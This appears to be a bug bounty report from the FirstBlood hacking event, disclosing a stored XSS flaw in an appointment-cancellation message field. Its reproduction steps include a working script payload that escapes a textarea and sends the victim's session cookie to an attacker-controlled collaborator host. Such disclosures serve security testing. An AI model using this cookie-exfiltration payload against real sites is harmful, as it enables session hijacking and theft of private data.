FirstBlood-#241Stored XSS via malicious appointment message leads to ATO



On 2021-05-14, jtcsec reported:

When canceling an appointment, you can update the message of the appointment via /api/ma.php . With the proper elements, you can escape the "textarea" field and execute arbitrary javascript.

Steps to repoduce:

  1. Create an appointment and make note of the ID
  2. Click "Manage Appointment" and input your ID. Hit "Cancel your Appointment"
  3. In burp, send the POST request that canceled the appointment to repeater
  4. Add the "message" field with the following payload:
    message=</textarea/x><script>var%20oReq%20%3D%20new%20XMLHttpRequest%28%29%3BoReq.open%28%22GET%22%2C%20%22http%3A%2F%2F{collaborator instance}%2F%22%2Bdocument.cookie%29%3BoReq.send%28%29%3B</script>
  5. Go back to the appointment directly: http://firstbloodhackers.com:49701/manageappointment.php?success&aptid={id from step 1}
  6. The page should load and the message box will be blank.
  7. Go to your collaborator instance and observe that a request was made with the drps cookie in the URL

Impact:

An attacker can send a malicious link to a doctor. If the doctor is logged in and they click it, the attacker is able to use the doctor's drps cookie to hijack their session, since in the PoC above the cookie is exfiltrated to the attackers host. This allows the attacker to view all patient and appointment private information.

P2 High

Endpoint: /api/ma.php

Parameter: message

Payload: message=</textarea/x><script>alert(document.domain)</script>


FirstBlood ID: 9
Vulnerability Type: Stored XSS

When cancelling an appointment, an attacker can add a malicious XSS payload that will execute on manageappointment. Any user (non authed) can view this and will be affected.

Report Feedback

@zseano

Creator & Administrator


Even though this is a dupe i'm awarding a bounty at my own discretion :) Nice find!


Respect Earnt: 2000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.